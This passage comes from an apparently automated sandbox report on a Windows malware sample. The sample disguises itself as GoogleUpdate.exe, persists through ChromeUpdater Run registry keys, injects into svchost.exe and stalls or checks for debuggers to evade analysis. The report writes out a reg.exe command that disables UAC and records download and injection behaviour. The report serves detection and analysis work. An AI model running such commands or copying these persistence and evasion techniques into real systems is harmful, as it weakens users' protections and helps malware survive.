Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_00454C08 push eax; ret	10_2_00454C26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02DA42E6 push ecx; ret	13_2_02DA42F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D500D8 push es; iretd	13_2_02D500D9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D5008C push es; iretd	13_2_02D5008D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02DAB4FD push esi; ret	13_2_02DAB506
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D82BD6 push ecx; ret	13_2_02D82BE9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02DA4C08 push eax; ret	13_2_02DA4C26
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_004542E6 push ecx; ret	15_2_004542F9
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_00432BD6 push ecx; ret	15_2_00432BE9
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_00454C08 push eax; ret	15_2_00454C26
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_004542E6 push ecx; ret	18_2_004542F9
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_00432BD6 push ecx; ret	18_2_00432BE9
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_00454C08 push eax; ret	18_2_00454C26

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Code function: 0_2_004063C6 ShellExecuteW,URLDownloadToFileW,

0_2_004063C6

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

File created: C:\ProgramData\GoogleDat\GoogleUpdate.exe

Jump to dropped file

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

File created: C:\ProgramData\GoogleDat\GoogleUpdate.exe

Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ChromeUpdater	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ChromeUpdater	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ChromeUpdater	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ChromeUpdater	Jump to behavior

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Code function: 0_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

0_2_00418A00

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ChromeUpdater	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ChromeUpdater	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ChromeUpdater	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ChromeUpdater	Jump to behavior

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

0_2_0041A8DA

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_0040E18D Sleep,ExitProcess,	0_2_0040E18D
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_0040E18D Sleep,ExitProcess,	10_2_0040E18D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D5E18D Sleep,ExitProcess,	13_2_02D5E18D
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_0040E18D Sleep,ExitProcess,	15_2_0040E18D
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_0040E18D Sleep,ExitProcess,	18_2_0040E18D

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\SysWOW64\svchost.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

Found stalling execution ending in API Sleep call

Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe

Stalling execution: Execution stalls by calling Sleep

graph_10-46610

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	0_2_004186FE
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	10_2_004186FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	13_2_02D686FE
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	15_2_004186FE
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	18_2_004186FE

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Window / User API: threadDelayed 3380	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Window / User API: threadDelayed 2813	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Window / User API: threadDelayed 868	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Window / User API: foregroundWindowGot 605	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Window / User API: foregroundWindowGot 1073	Jump to behavior

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Evaded block: after key decision	graph_0-45264
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Evaded block: after key decision	graph_0-45171
Source: C:\Windows\SysWOW64\svchost.exe	Evaded block: after key decision

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	API coverage: 5.9 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 5.1 %
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	API coverage: 4.9 %

Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe TID: 7928	Thread sleep count: 107 > 30	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe TID: 7928	Thread sleep time: -53500s >= -30000s	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe TID: 7932	Thread sleep count: 3380 > 30	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe TID: 7932	Thread sleep time: -10140000s >= -30000s	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe TID: 7940	Thread sleep count: 2813 > 30	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe TID: 7940	Thread sleep time: -8439000s >= -30000s	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe TID: 7932	Thread sleep count: 868 > 30	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe TID: 7932	Thread sleep time: -2604000s >= -30000s	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe TID: 7940	Thread sleep count: 252 > 30	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe TID: 7940	Thread sleep time: -756000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	0_2_0041A01B
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	0_2_0040B28E
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	0_2_0040838E
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	0_2_004087A0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	0_2_00407848
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_004068CD FindFirstFileW,FindNextFileW,	0_2_004068CD
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	0_2_0040AA71
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,	0_2_00417AAB
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	0_2_0040AC78
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	10_2_0041A01B
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	10_2_0040B28E
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	10_2_0040838E
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	10_2_004087A0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	10_2_00407848
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_004068CD FindFirstFileW,FindNextFileW,	10_2_004068CD
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	10_2_0040AA71
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,	10_2_00417AAB
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	10_2_0040AC78
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D5B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	13_2_02D5B28E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D5838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_02D5838E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D6A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	13_2_02D6A01B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D587A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_02D587A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D67AAB FindFirstFileW,FindNextFileW,FindNextFileW,	13_2_02D67AAB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D5AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	13_2_02D5AA71
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D568CD FindFirstFileW,FindNextFileW,	13_2_02D568CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D57848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	13_2_02D57848
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D5AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	13_2_02D5AC78
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	15_2_0041A01B
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	15_2_0040B28E
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	15_2_0040838E
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	15_2_004087A0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	15_2_00407848
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_004068CD FindFirstFileW,FindNextFileW,	15_2_004068CD
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_0044BA59 FindFirstFileExA,	15_2_0044BA59
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	15_2_0040AA71
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,	15_2_00417AAB
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	15_2_0040AC78
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	18_2_0041A01B
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	18_2_0040B28E
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	18_2_0040838E
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	18_2_004087A0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	18_2_00407848
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_004068CD FindFirstFileW,FindNextFileW,	18_2_004068CD
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	18_2_0040AA71
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,	18_2_00417AAB
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	18_2_0040AC78

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Code function: 0_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

0_2_00406D28

Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB

Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	API call chain: ExitProcess graph end node	graph_10-45590
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	API call chain: ExitProcess graph end node	graph_10-46637
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Code function: 0_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_004327AE

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

0_2_0041A8DA

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_004407B5 mov eax, dword ptr fs:[00000030h]	0_2_004407B5
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_004407B5 mov eax, dword ptr fs:[00000030h]	10_2_004407B5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D907B5 mov eax, dword ptr fs:[00000030h]	13_2_02D907B5
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_004407B5 mov eax, dword ptr fs:[00000030h]	15_2_004407B5
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_004407B5 mov eax, dword ptr fs:[00000030h]	18_2_004407B5

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Code function: 0_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,

0_2_00410763

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004327AE
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_004328FC SetUnhandledExceptionFilter,	0_2_004328FC
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004398AC
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00432D5C
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_004327AE
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_004328FC SetUnhandledExceptionFilter,	10_2_004328FC
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_004398AC
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00432D5C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D827AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_02D827AE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D828FC SetUnhandledExceptionFilter,	13_2_02D828FC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D898AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_02D898AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D82D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_02D82D5C
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_004327AE
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_004328FC SetUnhandledExceptionFilter,	15_2_004328FC
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_004398AC
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_00432D5C
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_004327AE
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_004328FC SetUnhandledExceptionFilter,	18_2_004328FC
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_004398AC
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_00432D5C

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe

10_2_0041642D

Maps a DLL or memory area into another process

Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe

Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2F88008

Jump to behavior

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe	0_2_00410B5C
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe	10_2_00410B5C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe	13_2_02D60B5C
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe	15_2_00410B5C
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe	18_2_00410B5C

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Code function: 0_2_004175E1 mouse_event,

0_2_004175E1

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\GoogleDat\GoogleUpdate.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ProgramData\GoogleDat\GoogleUpdate.exe C:\ProgramData\GoogleDat\GoogleUpdate.exe	Jump to behavior
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000073A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager.157:443
Source: GoogleUpdate.exe, 0000000A.00000002.4126961951.0000000002C24000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managero
Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000073A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managers.net,
Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000073A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manageres\|
Source: GoogleUpdate.exe, 0000000A.00000002.4126961951.0000000002C24000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager,
Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managers.net2
Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000073A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager.157:4
Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managers.n
Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000073A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerknown.
Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager5948/jo
Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000073A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager.157:443GBI
